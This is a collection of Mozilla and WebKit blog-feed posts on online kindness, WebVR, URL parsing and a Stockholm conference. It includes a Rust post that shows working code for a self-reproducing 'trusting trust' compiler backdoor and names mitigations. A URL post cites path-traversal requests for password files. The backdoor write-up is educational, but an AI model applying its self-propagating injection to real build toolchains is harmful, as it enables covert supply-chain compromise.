I’m not saying we can’t and shouldn’t criticise. I’m just saying knowing the context helps. And realising that being dismissive is always hurtful, especially when you have no idea how much work went into a product or an idea that you just don’t like.

There is a simple way to make this better. Ask questions. Ask why somebody did something the way they did it. And if you see that it is lack of experience or flat out wrong use of something, help them. It is pretty exciting. Often you will find that your first gut feeling of “this person is so wrong” is not correct, but that there are much more interesting problems behind the outcome. So go and look behind the scenes. Ask for context before telling people they’re doing it wrong.

Planet MozillaI Want an Internet of Humans

I'm going through some difficult times right now, for various reasons I'm not going into here. It's harder than usual to hold onto my hopes and dreams and the optimism for what's to come that fuels my life and powers me with energy. Unfortunately, there's also not a lot of support for those things in the world around me right now. Be it projects that I shared a vision with being shut down, be it hateful statements coming from and being thrown at a president elect in the US, politicians in many other countries, including e.g. the presidential candidates right here in Austria, or even organizations and members of communities I'm part of. It looks like the world is going through difficult times, and having an issue with holding on to hopes, dreams, and optimism. And it feels like even those that usually are beacons of light and preach hope are falling into the trap of preaching the fear of darkness - and as soon as fear enters our minds, it's starting a vicious cycle.

Some awesome person or group of people wrote a great dialog into Star Wars Episode I, peaking in Yoda's "Fear is the path to the dark side. Fear leads to anger. Anger leads to hate. Hate leads to suffering." - And so true this is. Think about it.

People fear about securing their well-being, about being able to live the life they find worth living (including their jobs(, and about knowing what to expect of today and tomorrow. When this fear is nurtured, it grows, leads to anger about anything that seems to threaten it. They react hatefully to anyone just seeming to support those perceived threats. And those targeted by that hate hurt and suffer, start to fear the "haters", and go through the cycle from the other side. And and in that climate, the basic human uneasy feeling of "life for me is mostly OK, so any change and anything different is something to fear" falls onto fertile ground and grows into massive metathesiophobia (fear of change) and things like racism, homophobia, xenophobia, hate of other religions, and all kinds of other demons rise up.

Those are all deeply rooted in sincere, common human emotions (maybe even instincts) that we can live with, overcome and even turn around into e.g. embracing infinite diversity in infinite combinations like e.g. Star Trek, or we can go and shove them away into a corner of our existence, not decomposing them at their basic stage, and letting them grow until they are large enough that they drive our thinking, our personality - and make us easy to influence by people talking to them. And that works well both for the fears that e.g. some politicians spread and play with and the same for the fears of their opponents. Even the fear of hate and fear taking over is not excluded from this - on the contrary, it can fire up otherwise loving humans into going fully against what the actually want to be.

That said, when a human stands across another human and looks in his or her face, looks into their eyes, as long as we still realize there is a feeling, caring other person on the receiving end of whatever we communicate, it's often harder to start into this circle - if we are already deep into the fear and hate, and in some other circumstances this may not be always true, but in a lot of cases it is.

On the Internet, not so much. We interact with and through a machine, see an "account" on the other end, remove all the context of what was said before and after, of the tone of voice and body language, of what surroundings others are in, we reduce to a few words that are convenient to type or what the communication system limits us to - and we go for whatever gives us the most attention. Because we don't actually feel like we interact with other real humans, it's mostly about what we get out of it. A lot of likes, reshares, replies, interactions. It helps that the services we use maximize whatever their KPI are and not optimize for what people actually want - after all, they want to earn money and that means having a lot of activity, and making people happy is not an actual goal, at best a wishful side effect.

We need to change that. We need to make social media actually social again (this talk by Chris Heilmann is really worth watching). We need to spread love ("make Trek, not Wars" in a tounge-in-cheek kind of way, no meaning negativity towards any franchise, but thinking about meanings and how we can make things better for our neighbors, our community, our world), not even hate the fear or fear the hate (which leads back into the circle), but analyze it, take it seriously and break it down. If we understand it, know how to deal with it, but not let it overcome us, fear can even be healthy - as another great screenwriter put it "Fear only exists for one purpose: To be conquered". That is where we need to get ourselves, and need to help those other humans end up that spread hate and unreflected fear - or act out of that. Not by hating them back, but by trying to understand and help them.

We need to see the people, the humans, behind what we read on the Internet (I deeply recommend for you to watch this very recent talk by Erika Baker as well). I don't see it as a "Crusade against Internet hate" as mentioned in the end of that talk, but more as a "Rally for Internet love" (unfortunately, some people would ridicule that wording but I see it as the love of humanity, the love for the human being inside each and everyone of us). I'm always finding it mind-blowing that every single person I see around me, that reads this, that uses some software I helped with, and every single other person on this planet (or in its orbit, there are none out further at this time as far as I know), is a fully, thinking, feeling, caring human being. Every one of those is different, every one of those has their own thoughts and fears that need to be addressed and that we need to address. And every one of those wants to be loved. And they should be. No matter who they voted for. No matter if they are a president elect or a losing candidate. We don't need to agree with everything they are saying. But their fears should be addressed and conquered. And yes, they should be loved. Their differences should be celebrated and their commonalities embraced at the same time. Yes, that's possible, think about it. Again, see the philosophy of infinite diversity in infinite combinations.

I want an Internet that connects those humans, brings them closer together, makes them understand each other more, makes them love each other's humanity. I don't care how many "things" we connect to the Internet, I care that the needs and feelings of humans and their individual and shared lives improve. I care that their devices and gadgets are their own, help their individuality, and help them embrace other humans (not treat them as accounts and heaps to data to be analyzed and sold stuff to). I want everyone to see that everyone else is (just) human, and spread love to or at least embrace them as humans. Then the world, the humans in it, and myself, can make it out of the difficult times and live long and prosper in the future.

I want an Internet of humans.
We all, me, you can start creating that in how we interact with each other on social networks and other places on the web and even in the real world, and we can build it into whatever work we are doing.

I want an Internet of humans.
Can, will, you help?

Planet MozillaWilliam Gibson Overdrive

From William Gibson’s “Spook Country”:

She stood beneath Archie’s tail, enjoying the flood of images rushing from the arrowhead fluke toward the tips of the two long hunting tentacles. Something about Victorian girls in their underwear had just passed, and she wondered if that was part of Picnic at Hanging Rock, a film which Inchmale had been fond of sampling on DVD for preshow inspiration. Someone had cooked a beautifully lumpy porridge of imagery for Bobby, and she hadn’t noticed it loop yet. It just kept coming.

And standing under it, head conveniently stuck in the wireless helmet, let her pretend she wasn’t hearing Bobby hissing irritably at Alberto for having brought her here.

It seemed almost to jump, now, with a flowering rush of silent explosions, bombs blasting against black night. She reached up to steady the helmet, tipping her head back at a particularly bright burst of flame, and accidentally encountered a control surface mounted to the left of the visor, over her cheekbone. The Shinjuku squid and its swarming skin vanished.

Beyond where it had been, as if its tail had been a directional arrow, hung a translucent rectangular solid of silvery wireframe, crisp yet insubstantial. It was large, long enough to park a car or two in, and easily tall enough to walk into, and something about these dimensions seemed familiar and banal. Within it, too, there seemed to be another form, or forms, but because everything was wireframed it all ran together visually, becoming difficult to read.

She was turning, to ask Bobby what this work in progress might become, when he tore the helmet from her head so roughly that she nearly fell over.

This left them frozen there, the helmet between them. Bobby’s blue eyes loomed owl-wide behind diagonal blondness, reminding her powerfully of one particular photograph of Kurt Cobain. Then Alberto took the helmet from them both. “Bobby,” he said, “you’ve really got to calm down. This is important. She’s writing an article about locative art. For Node.”

“Node?”

“Node.”

“The fuck is Node?”

I just finished building that. A poor man’s version of that, at least – there’s more to do, but you can stand it up in a couple of seconds and it works; a Node-based Flyweb discovery service that serves up a discoverable VR environment.

It was harder than I expected – NPM and WebVR are pretty uneven experiences from a novice web-developer’s perspective, and I have exciting opinions about the state of the web development ecosystem right now – but putting that aside: I just pushed the first working prototype up to Github a few minutes ago. It’s crude, the code’s ugly but it works; a 3D locative virtual art gallery. If you’ve got the right tools and you’re standing in the right place, you can look through the glass and see another world entirely.

Maybe the good parts of William Gibson’s visions of the future deserve a shot at existing too.

Planet MozillaReflections on Rusting Trust

The Rust compiler is written in Rust. This is overall a pretty common practice in compiler development. This usually means that the process of building the compiler involves downloading a (typically) older version of the compiler.

This also means that the compiler is vulnerable to what is colloquially known as the “Trusting Trust” attack, an attack described in Ken Thompson’s acceptance speech for the 1983 Turing Award. This kind of thing fascinates me, so I decided to try writing one myself. It’s stuff like this which started my interest in compilers, and I hope this post can help get others interested the same way.

To be clear, this isn’t an indictment of Rust’s security. Quite a few languages out there have popular self-hosted compilers (C, C++, Haskell, Scala, D, Go) and are vulnerable to this attack. For this attack to have any effect, one needs to be able to uniformly distribute this compiler, and there are roughly equivalent ways of doing the same level of damage with that kind of access.

If you already know what a trusting trust attack is, you can skip the next section. If you just want to see the code, it’s in the trusting-trust branch on my Rust fork, specifically this code.

The attack

The essence of the attack is this:

An attacker can conceivably change a compiler such that it can detect a particular kind of application and make malicious changes to it. The example given in the talk was the UNIX login program — the attacker can tweak a compiler so as to detect that it is compiling the login program, and compile in a backdoor that lets it unconditionally accept a special password (created by the attacker) for any user, thereby giving the attacker access to all accounts on all systems that have login compiled by their modified compiler.

However, this change would be detected in the source. If it was not included in the source, this change would disappear in the next release of the compiler, or when someone else compiles the compiler from source. Avoiding this attack is easily done by compiling your own compilers and not downloading untrusted binaries. This is good advice in general regarding untrusted binaries, and it equally applies here.

To counter this, the attacker can go one step further. If they can tweak the compiler so as to backdoor login, they could also tweak the compiler so as to backdoor itself. The attacker needs to modify the compiler with a backdoor which detects when it is compiling the same compiler, and introduces itself into the compiler that it is compiling. On top of this it can also introduce backdoors into login or whatever other program the attacker is interested in.

Now, in this case, even if the backdoor is removed from the source, every compiler compiled using this backdoored compiler will be similarly backdoored. So if this backdoored compiler somehow starts getting distributed, it will spread itself as it is used to compile more copies of itself (e.g. newer versions, etc). And it will be virtually undetectable — since the source doesn’t need to be modified for it to work; just the non-human-readable binary.

Of course, there are ways to protect against this. Ultimately, before a compiler for language X existed, that compiler had to be written in some other language Y. If you can track the sources back to that point you can bootstrap a working compiler from scratch and keep compiling newer compiler versions till you reach the present. This raises the question of whether or not Y’s compiler is backdoored. While it sounds pretty unlikely that such a backdoor could be so robust as to work on two different compilers and stay put throughout the history of X, you can of course trace back Y back to other languages and so on till you find a compiler in assembly that you can verify1.

Backdooring Rust

Alright, so I want to backdoor my compiler. I first have to decide when in the pipeline the code that insert backdoors executes. The Rust compiler operates by taking source code, parsing it into a syntax tree (AST), transforming it into some intermediate representations (HIR and MIR), and feeding it to LLVM in the form of LLVM IR, after which LLVM does its thing and creates binaries. A backdoor can be inserted at any point in this stage. To me, it seems like it’s easier to insert one into the AST, because it’s easier to obtain AST from source, and this is important as we’ll see soon. It also makes this attack less practically viable2, which is nice since this is just a fun exercise and I don’t actually want to backdoor the compiler.

So the moment the compiler finishes parsing, my code will modify the AST to insert a backdoor.

First, I’ll try to write a simpler backdoor; one which doesn’t affect the compiler but instead affects some programs. I shall write a backdoor that replaces occurrences of the string “hello world” with “जगाला नमस्कार”, a rough translation of the same in my native language.

Now, in rustc, the rustc_driver crate is where the whole process of compiling is coordinated. In particular, phase_2_configure_and_expand is run right after parsing (which is phase 1). Perfect. Within that function, the krate variable contains the parsed AST for the crate3, and we need to modify that.

In this case, there’s already machinery in syntax::fold for mutating ASTs based on patterns. A Folder basically has the ability to walk the AST, producing a mirror AST, with modifications. For each kind of node, you get to specify a function which will produce a node to be used in its place. Most such functions will default to no-op (returning the same node).

So I write the following Folder:

// Understanding the minute details of this code isn't important; it is a bit complex
// since the API used here isn't meant to be used this way. Focus on the comments.

mod trust {
    use syntax::fold::*;
    use syntax::ast::*;
    use syntax::parse::token::InternedString;
    use syntax::ptr::P;
    struct TrustFolder;

    // The trait contains default impls which we override for specific cases
    impl Folder for TrustFolder {
        // every time we come across an expression, run this function
        // on it and replace it with the produced expression in the tree
        fn fold_expr(&mut self, expr: P<Expr>) -> P<Expr> {
            // The peculiar `.map` pattern needs to be used here
            // because of the way AST nodes are stored in immutable
            // `P<T>` pointers. The AST is not typically mutated.
            expr.map(|mut expr| {
                match expr.node {
                    ExprKind::Lit(ref mut l) => {
                        *l = l.clone().map(|mut l| {
                            // look for string literals
                            if let LitKind::Str(ref mut s, _) = l.node {
                                // replace their contents
                                if s == "hello world" {
                                    *s = InternedString::new("जगाला नमस्कार");
                                }
                            }
                            l
                        })
                    }
                    _ => ()
                }
                // recurse down expression with the default fold
                noop_fold_expr(expr, self)
            })
        }
        fn fold_mac(&mut self, mac: Mac) -> Mac {
            // Folders are not typically supposed to operate on pre-macro-expansion ASTs
            // and will by default panic here. We must explicitly specify otherwise.
            noop_fold_mac(mac, self)
        }
    }

    // our entry point
    pub fn fold_crate(krate: Crate) -> Crate {
        // make a folder, fold the crate with it
        TrustFolder.fold_crate(krate)
    }
}

I invoke it by calling let krate = trust::fold_crate(krate); as the first line of phase_2_configure_and_expand.

I create a stage 1 build4 of rustc (make rustc-stage1). I’ve already set up rustup to have a “stage1” toolchain pointing to this folder (rustup toolchain link stage1 /path/to/rust/target_triple/stage1), so I can easily test this new compiler:

// test.rs
fn main() {
    let x = "hello world";
    println!("{}", x);
}
$ rustup run stage1 rustc test.rs
$ ./test
जगाला नमस्कार

Note that I had the string on a separate line instead of directly doing println!("hello world"). This is because our backdoor isn’t perfect; it applies to the pre-expansion AST. In this AST, println! is stored as a macro and the "hello world" is part of the macro token tree; and has not yet been turned into an expression. Our folder ignores it. It is not too hard to perform this same attack post-expansion, however.

So far, so good. We have a compiler that tweaks “hello world” strings. Now, let’s see if we can get it to miscompile itself. This means that our compiler, when compiling a pristine Rust source tree, should produce a compiler that is similarly backdoored (with the trust module and the trust::fold_crate() call).

We need to tweak our folder so that it does two things:

  • Inserts the let krate = trust::fold_crate(krate); statement in the appropriate function (phase_2_configure_and_expand) when compiling a pristine Rust source tree
  • Inserts the trust module

The former is relatively easy. We need to construct an AST for that statement (can be done by invoking the parser again and extracting the node). The latter is where it gets tricky. We can encode instructions for outputting the AST of the trust module, but these instructions themselves are within the same module, so the instructions for outputting these instructions need to be included, and so on. This clearly isn’t viable.

However, there’s a way around this. It’s a common trick used in writing quines, which face similar issues. The idea is to put the entire block of code in a string. We then construct the code for the module by doing something like

mod trust {
    static SELF_STRING: &'static str = "/* stringified contents of this module except for this line */";
    // ..
    fn fold_mod(..) {
        // ..
        // this produces a string that is the same as the code for the module containing it
        // SELF_STRING is used twice, once to produce the string literal for SELF_STRING, and
        // once to produce the code for the module
        let code_for_module = "mod trust { static SELF_STRING: &'static str = \"" + SELF_STRING + "\";" + SELF_STRING + "}";
        insert_into_crate(code_for_module);
        // ..
    }
    // ..
}

With the code of the module entered in, this will look something like

mod trust {
    static SELF_STRING: &'static str = "
        // .. 
        fn fold_mod(..) {
            // ..
            // this produces a string that is the same as the code for the module containing it
            // SELF_STRING is used twice, once to produce the string literal for SELF_STRING, and
            // once to produce the code for the module
            let code_for_module = \"mod trust { static SELF_STRING: &'static str = \\\"\" + SELF_STRING + \"\\\";\" + SELF_STRING + \"}\";
            insert_into_crate(code_for_module);
            // ..
        }
        // ..
    ";

    // ..
    fn fold_mod(..) {
        // ..
        // this produces a string that is the same as the code for the module containing it
        // SELF_STRING is used twice, once to produce the string literal for SELF_STRING, and
        // once to produce the code for the module
        let code_for_module = "mod trust { static SELF_STRING: &'static str = \"" + SELF_STRING + "\";" + SELF_STRING + "}";
        insert_into_crate(code_for_module);
        // ..
    }
    // ..
}

So you have a string containing the contents of the module, except for itself. You build the code for the module by using the string twice – once to construct the code for the declaration of the string, and once to construct the code for the rest of the module. Now, by parsing this, you’ll get the original AST!

Let’s try this step by step. Let’s first see if injecting an arbitrary string (use foo::bar::blah) works, without worrying about this cyclical quineyness:

mod trust {
    // dummy string just to see if it gets injected
    // inserting the full code of this module has some practical concerns
    // about escaping which I'll address later
    static SELF_STRING: &'static str = "use foo::bar::blah;";
    use syntax::fold::*;
    use syntax::ast::*;
    use syntax::parse::parse_crate_from_source_str;
    use syntax::parse::token::InternedString;
    use syntax::ptr::P;
    use syntax::util::move_map::MoveMap;
    use rustc::session::Session;

    struct TrustFolder<'a> {
        // we need the session to be able to parse things. No biggie.
        sess: &'a Session,
    }

    impl<'a> Folder for TrustFolder<'a> {
        fn fold_expr(&mut self, expr: P<Expr>) -> P<Expr> {
            expr.map(|mut expr| {
                match expr.node {
                    ExprKind::Lit(ref mut l) => {
                        *l = l.clone().map(|mut l| {
                            if let LitKind::Str(ref mut s, _) = l.node {
                                if s == "hello world" {
                                    *s = InternedString::new("जगाला नमस्कार");
                                }
                            }
                            l
                        })
                    }
                    _ => ()
                }
                noop_fold_expr(expr, self)
            })
        }
        fn fold_mod(&mut self, m: Mod) -> Mod {
            // move_flat_map takes a vector, constructs a new one by operating
            // on each element by-move. Again, needed because of `P<T>`
            let new_items = m.items.move_flat_map(|item| {
                // we want to modify this function, and give it a sibling from SELF_STRING
                if item.ident.name.as_str() == "phase_2_configure_and_expand" {
                    // parse SELF_STRING
                    let new_crate = parse_crate_from_source_str("trust".into(),
                                                                SELF_STRING.into(),
                                                                &self.sess.parse_sess).unwrap();
                    // extract the first item contained in it, which is the use statement
                    let inner_item = new_crate.module.items[0].clone();

                    // move_flat_map needs an iterator of items to insert
                    vec![inner_item, item].into_iter()
                } else {
                    vec![item].into_iter()
                }
            });
            let m = Mod {
                inner: m.inner,
                items: new_items,
            };
            noop_fold_mod(m, self)
        }
        fn fold_mac(&mut self, _mac: Mac) -> Mac {
            noop_fold_mac(_mac, self)
        }
    }

    pub fn fold_crate(krate: Crate, sess: &Session) -> Crate {
        let mut folder = TrustFolder {sess: sess};
        folder.fold_crate(krate)
    }
}

We also change the original call in phase_2_configure_and_expand to let krate = trust::fold_crate(krate, sess);

Compiling with make rustc-stage2 (we now want the backdoored stage1 compiler to try and compile the same sources and fudge the phase_2_configure_and_expand function the second time around), gets us this error:

rustc: x86_64-apple-darwin/stage1/lib/rustlib/x86_64-apple-darwin/lib/librustc_driver
error[E0432]: unresolved import `foo::bar::blah`
 --> trust:1:5
  |
1 | use foo::bar::blah;
  |     ^^^^^^^^^^^^^^ Maybe a missing `extern crate foo;`?

error: aborting due to previous error

This is exactly what we expected! We inserted the code use foo::bar::blah;, which isn’t going to resolve, and thus got a failure when compiling the crate the second time around.

Let’s add the code for the quineyness and for inserting the fold_crate call:

fn fold_mod(&mut self, m: Mod) -> Mod {
    let new_items = m.items.move_flat_map(|item| {
        // look for the phase_2_configure_and_expand function
        if item.ident.name.as_str() == "phase_2_configure_and_expand" {
            // construct the code for the module contents as described earlier
            let code_for_module = r###"mod trust { static SELF_STRING: &'static str = r##"###.to_string() + r###"##""### + SELF_STRING + r###""##"### + r###"##;"### + SELF_STRING + "}";
            // Parse it into an AST by creating a crate only containing that code
            let new_crate = parse_crate_from_source_str("trust".into(),
                                                        code_for_module,
                                                        &self.sess.parse_sess).unwrap();
            // extract the AST of the contained module
            let inner_mod = new_crate.module.items[0].clone();

            // now to insert the fold_crate() call
            let item = item.map(|mut i| {
                if let ItemKind::Fn(.., ref mut block) = i.node {
                    *block = block.clone().map(|mut b| {
                        // create a temporary crate just containing a fold_crate call
                        let new_crate = parse_crate_from_source_str("trust".into(),
                                                                    "fn trust() {let krate = trust::fold_crate(krate, sess);}".into(),
                                                                    &self.sess.parse_sess).unwrap();
                        // extract the AST from the parsed temporary crate, shove it in here
                        if let ItemKind::Fn(.., ref blk) = new_crate.module.items[0].node {
                            b.stmts.insert(0, blk.stmts[0].clone());
                        }
                        b
                    });
                }
                i
            });
            // yield both the created module and the modified function to move_flat_map
            vec![inner_mod, item].into_iter()
        } else {
            vec![item].into_iter()
        }
    });
    let m = Mod {
        inner: m.inner,
        items: new_items,
    };
    noop_fold_mod(m, self)
}

The #s let us specify “raw strings” in Rust, where I can freely include other quotation marks without needing to escape things. For a string starting with n pound symbols, we can have raw strings with up to n - 1 pound symbols inside it. The SELF_STRING is declared with four pound symbols, and the code in the trust module only uses raw strings with three pound symbols. Since the code needs to generate the declaration of SELF_STRING (with four pound symbols), we manually concatenate extra pound symbols on – a 4-pound-symbol raw string will not be valid within a three- pound-symbol raw string since the parser will try to end the string early. So we don’t ever directly type a sequence of four consecutive pound symbols in the code, and instead construct it by concatenating two pairs of pound symbols.

Ultimately, the code_for_module declaration really does the same as:

let code_for_module = "mod trust { static SELF_STRING: &'static str = \"" + SELF_STRING + "\";" + SELF_STRING + "}";

conceptually, but also ensures that things stay escaped. I could get similar results by calling into a function that takes a string and inserts literal backslashes at the appropriate points.

To update SELF_STRING, we just need to include all the code inside the trust module after the declaration of SELF_STRING itself inside the string. I won’t include this inline since it’s big, but this is what it looks like in the end.

If we try compiling this code to stage 2 after updating SELF_STRING, we will get errors about duplicate trust modules, which makes sense because we’re actually already compiling an already- backdoored version of the Rust source code. While we could set up two Rust builds, the easiest way to verify if our attack is working is to just use #[cfg(stage0)] on the trust module and the fold_crate call5. These will only get included during “stage 0” (when it compiles the stage 1 compiler6), and not when it compiles the stage 2 compiler, so if the stage 2 compiler still backdoors executables, we’re done.

On building the stage 2 (make rustc-stage2) compiler,

$ rustup run stage2 rustc test.rs
$ ./test
जगाला नमस्कार

I was also able to make it work with a separate clone of Rust:

$ cd /path/to/new/clone
# Tell rustup to use our backdoored stage1 compiler whenever rustc is invoked
# from anywhere inside this folder.
$ rustup override set stage1 # Works with stage 2 as well.

# with --enable-local-rust, instead of the downloaded stage 0 compiler compiling
# stage 0 internal libraries (like libsyntax), the libraries from the local Rust get used. Hence we
# need to check out a git commit close to our changes. This commit is the parent of our changes,
# and is bound to work
$ git checkout bfa709a38a8c607e1c13ee5635fbfd1940eb18b1

# This will make it call `rustc` instead of downloading its own compiler.
# We already overrode rustc to be our backdoored compiler for this folder
# using rustup
$ ./configure --enable-local-rust
# build it!
$ make rustc-stage1
# Tell rustup about the new toolchain
$ rustup toolchain link other-stage1 /path/to/new/clone/target_dir/stage1
$ rustup run other-stage1 rustc test.rs
$ ./test
जगाला नमस्कार

Thus, a pristine copy of the rustc source has built a compiler infected with the backdoor.


So we now have a working trusting trust attack in Rust. What can we do with it? Hopefully nothing! This particular attack isn’t very robust, and while that can be improved upon, building a practical and resilient trusting trust attack that won’t get noticed is a bit trickier.

We in the Rust community should be working on ways to prevent such attacks from being successful, though.

A couple of things we could do are:

  • Work on an alternate Rust compiler (in Rust or otherwise). For a pair of self-hosted compilers, there’s a technique called “Diverse Double-Compiling” wherein you choose an arbitrary sequence of compilers (something like “gcc followed by 3x clang followed by gcc” followed by clang), and compile each compiler with the output of the previous one. Difficulty of writing a backdoor that can survive this process grows exponentially.
  • Try compiling rustc from its ocaml roots, and package up the process into a shell script so that you have reproducible trustworthy rustc builds.
  • Make rustc builds deterministic, which means that a known-trustworthy rustc build can be compared against a suspect one to figure out if it has been tampered with.

Overall trusting trust attacks aren’t that pressing a concern since there are many other ways to get approximately equivalent access with the same threat model. Having the ability to insert any backdoor into distributed binaries is bad enough, and should be protected against regardless of whether or not the backdoor is a self-propagating one. If someone had access to the distribution or build servers, for example, they could as easily insert a backdoor into the server, or place a key so that they can reupload tampered binaries when they want. Now, cleaning up after these attacks is easier than trusting trust, but ultimately this is like comparing being at the epicenter of Little Boy or the Tsar Bomba – one is worse, but you’re atomized regardless, and your mitigation plan shouldn’t need to change.

But it’s certainly an interesting attack, and should be something we should at least be thinking about.

Thanks to Josh Matthews, Michael Layzell, Diane Hosfelt, Eevee, and Yehuda Katz for reviewing drafts of this post.

Discuss: HN, Reddit


  1. Of course, this raises the question of whether or not your assembler/OS/loader/processor is backdoored. Ultimately, you have to trust someone, which was partly the point of Thompson’s talk.

  2. The AST turns up in the metadata/debuginfo/error messages, can be inspected from the command line, and in general is very far upstream and affects a number of things (all the other stages in the pipeline). You could write code to strip it out from these during inspection and only have it turn up in the binary, but that is much harder.

  3. The local variable is called krate because crate is a keyword

  4. Stage 1 takes the downloaded (older) rust compiler and compiles the sources from it. The stage 2 compiler is build when the stage 1 compiler (which is a “new” compiler) is used to compile the sources again.

  5. Using it on the fold_crate call requires enabling the “attributes on statements” feature, but that’s no big deal – we’re only using the cfgs to be able to test easily; this feature won’t actually be required if we use our stage1 compiler to compile a clean clone of the sources.

  6. The numbering of the stages is a bit confusing. During “stage 0” (cfg(stage0)), the stage 1 compiler is built. Since you are building the stage 1 compiler, the make invocation is make rustc-stage1. Similarly, during stage 1, the stage 2 compiler is built, and the invocation is make rustc-stage2 but you use #[cfg(stage1)] in the code.

Planet WebKitURL Parsing in WebKit

It’s 2016. URLs have been used for decades now. You would think they would have consistent behavior. You would be wrong.

Conformance

A quick visit to the URL constructor conformance test shows that modern specification conformance is poor; no shipping browser passes more than about 2/3 of the tests, and more tests are needed to cover more edge cases. WebKit trunk, which is shipped in Safari Technology Preview is the most standards-conformant URL parser in any major browser engine right now.

Uniformity among browsers is crucial with such a fundamental piece of internet infrastructure, and differences break web applications in subtle ways. For example, new URL('file:afc') behaves differently in each major browser engine:

  • In Safari 10, it is canonicalized to file://afc
  • In Firefox 49, it is canonicalized to file:///afc
  • In Chrome 53, it is canonicalized to file://afc/ on Windows and file:///afc on macOS
  • In Edge 38, it throws a JavaScript exception

Hopefully nobody is relying on consistent behavior with such a malformed URL, but there are many such differences between browsers. Unfortunately the current solution for web developers is to avoid URLs that behave differently in different browsers. This should not be the case.

What is the definition of “correct” behavior, though? If URL implementations with a market share exhibit a certain behavior, then that behavior becomes the de-facto standard, but there are different markets within the Internet. If you are running an international web service accessible by a web browser, then browsers with a majority market share are what you care most about. If you have mobile traffic, you care more about browsers’ mobile market share. If you have a native application using an operating system’s URL implementation, you have probably worked around that operating system’s quirks, and any changes to the operating system might break your app.

Unfortunately, changing URL behavior can break web applications that are relying on existing quirks. For example, you might be trying to reduce your server’s bandwidth use by removing unnecessary characters in URLs. If you are doing a user agent check on requests to your server hosting https://example.org/ and putting <a href="https:/webkit.org"> for WebKit-based user agents instead of <a href="https://webkit.org">, then WebKit becoming more standards compliant will break your link. It used to go to https://webkit.org/ and now it goes to https://example.org/webkit.org matching Chrome, Firefox, and the URL specification. If you are doing tricky things with user agent checks, you can expect to have fragile web applications that may break as browsers evolve.

Security

Browsers are not the only programs that use URLs. There are many widely-used URL parser implementations, such as in WebKit, Chromium, Gecko, cURL, PHP, libsoup and many others, as well as many closed-source implementations. Ideally every program that parses a URL would behave the same to be interoperable and be cautious of invalid input.

HTTP servers often don’t see the entire URL of the client. They only receive the path and query in the first line of the HTTP request, which usually looks something like GET /index.html?id=5 HTTP/1.1. Servers often have different types of parsers that only parse the path and query. Servers need to be especially careful to not assume that the path is not trying to access files outside of the document root with requests like GET ../passwords.txt HTTP/1.1 or GET %2e%2e/passwords.txt HTTP/1.1 which, if passed directly to the file system, might give attackers access to private files. Servers should also be cautious of non-ASCII characters being sent by malicious clients.

You may have unexpected load failures if you have a web application that uses Content Security Policy and makes requests to the same host written in different ways. For example “http://example.com” and “http://ex%61mple.com” ought to be equal, and “http://[::0:abcd]” and “http://[::abcd]” are equal IPv6 addresses. Inconsistent host parsing has unexpected security implications.

Performance

Performance of URL parsers is an important consideration. There are not many applications where URL parsing is the slowest operation, but there are many operations involving URL parsing, so making URL parsing faster makes many operations a little bit faster. An ideal benchmark would measure performance of parsing real URLs from popular websites, but publishing such benchmarks is problematic because URLs often contain personally identifiable information, such as https://example.org/?user_id=57483. On such a benchmark, trunk WebKit’s URL parser is 20% faster than WebKit in Safari 10. In practice, most of the time is spent parsing the path and the query of URLs, which are often the longest and contain the most information, as well as the host, which requires the most encoding. A true apples-to-apples comparison of URL parsing among different browsers is impossible right now because behavior is so different.

TL;DR

URL implementations in browsers and elsewhere need to change and become more consistent and safe. Web developers need to adapt to such changes. If there are differences of opinion, we should discuss and resolve them. If changing breaks things, we should consider what the Internet will be decades from now. Web standards conformance makes the Internet better for everyone.

If you have any questions or comments, please contact me at @alexfchr, or Jonathan Davis, Apple’s Web Technologies Evangelist, at @jonathandavis or web-evangelist@apple.com.

Planet MozillaParticipation Demos - Q4/2016

Participation Demos - Q4/2016 Find out what Participation has been up to in Q4 2016

Planet MozillaPixels, Politics and P2P – Internet Days Stockholm 2016

Internet Days Logo

I just got back from the Internet Days conference in Stockholm, Sweden. I was flattered when I was asked to speak at this prestigious event, but I had no idea until I arrived just how much fun it would be.

lanyard

I loved the branding of he conference as it was all about pixels and love. Things we now need more of – the latter more than the former. As a presenter, I felt incredibly pampered. I had a driver pick me up at the airport (which I didn’t know, so I took the train) and I was put up in the pretty amazing Waterfront hotel connected to the convention centre of the conference.

chris loves internet

This was the first time I heard about the internet days and for those who haven’t either, I can only recommend it. Imagine a mixture of a deep technical conference on all matters internet – connectivity, technologies and programming – mixed with a TED event on current political matters.

The technology setup was breathtaking. The stage tech was flawless and all the talks were streamed and live edited (mixed with slides). Thus they became available on YouTube about an hour after you delivered them. Wonderful work, and very rewarding as a presenter.

I talked in detail about my keynote in another post, so here are the others I enjoyed:

Juliana Rotich of BRCK and Ushahidi fame talked about connectivity for the world and how this is far from being a normal thing.

Erika Baker gave a heartfelt talk about how she doesn’t feel safe about anything that is happening in the web world right now and how we need to stop seeing each other as accounts but care more about us as people.

Incidentally, this reminded me a lot of my TEDx talk in Linz about making social media more social again:

The big bang to end the first day of the conference was of course the live skype interview with Edward Snowden. In the one hour interview he covered a lot of truths about security, privacy and surveillance and he had many calls to action anyone of us can do now.

What I liked most about him was how humble he was. His whole presentation was about how it doesn’t matter what will happen to him, how it is important to remember the others that went down with him, and how he wishes for us to use the information we have now to make sure our future is not one of silence and fear.

In addition to my keynote I also took part in a panel discussion on how to inspire creativity.

The whole conference was about activism of sorts. I had lots of conversations with privacy experts of all levels: developers, network engineers, journalists and lawyers. The only thing that is a bit of an issue is that most talks outside the keynotes were in Swedish, but having lots of people to chat with about important issues made up for this.

The speaker present was a certificate that all the CO2 our travel created was off-set by the conference and an Arduino-powered robot used to teach kids. In general, the conference was about preservation and donating to good courses. There was a place where you can touch your conference pass and coins will fall into a hat describing that your check-in just meant that the organisers donated a Euro to doctors without frontiers.

Foodrobotwater

The catering was stunning and with the omission of meat CO2 friendly. Instead of giving out water bottles the drinks were glasses of water, which in Stockholm is in some cases better quality than bottled water.

I am humbled and happy that I could play my part in this great event. It gave me hope that the web isn’t just run over by trolls, privileged complainers and people who don’t care if this great gift of information exchange is being taken from us bit by bit.

Make sure to check out all the talks, it is really worth your time. Thank you to everyone involved in this wonderful event!

Planet MozillaFaster git-cinnabar graft of gecko-dev

Cloning Mozilla repositories from scratch with git-cinnabar can be a long process. Grafting them to gecko-dev is an equally long process.

The metadata git-cinnabar keeps is such that it can be exchanged, but it’s also structured in a way that doesn’t allow git push and fetch to do that efficiently, and pushing refs/cinnabar/metadata to github fails because it wants to push more than 2GB of data, which github doesn’t allow.

